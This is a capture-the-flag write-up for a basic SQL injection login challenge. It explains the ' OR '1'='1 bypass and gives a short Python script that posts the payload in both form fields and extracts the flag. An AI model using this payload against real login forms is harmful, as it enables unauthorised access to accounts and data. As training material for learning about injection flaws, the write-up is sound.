The Challenge

A login form. The backend builds the SQL query by string-concatenating user input without sanitisation.

Approach

' OR '1'='1 closes the existing string literal, appends a condition that is always true, and reopens the string. The resulting query returns all rows, satisfying the login check and printing the flag.

Solution

1
2
3
4

import requests
site = "http://basic-sqli.challs.olicyber.it/"
r = requests.post(site, data={"username":"' OR '1'='1", "password":"' OR '1'='1"})
print(r.text[r.text.find("flag{"):r.text.find("}")] + "}", end="")

Both fields use the payload. The response HTML contains flag{...}; str.find locates the start and end to extract exactly the flag token.

What I Learned

OR-based login bypass is the foundation of SQL injection. It works whenever user input is directly interpolated into a WHERE clause without parameterised queries or escaping. Sending the payload in both fields avoids situations where only one field is vulnerable.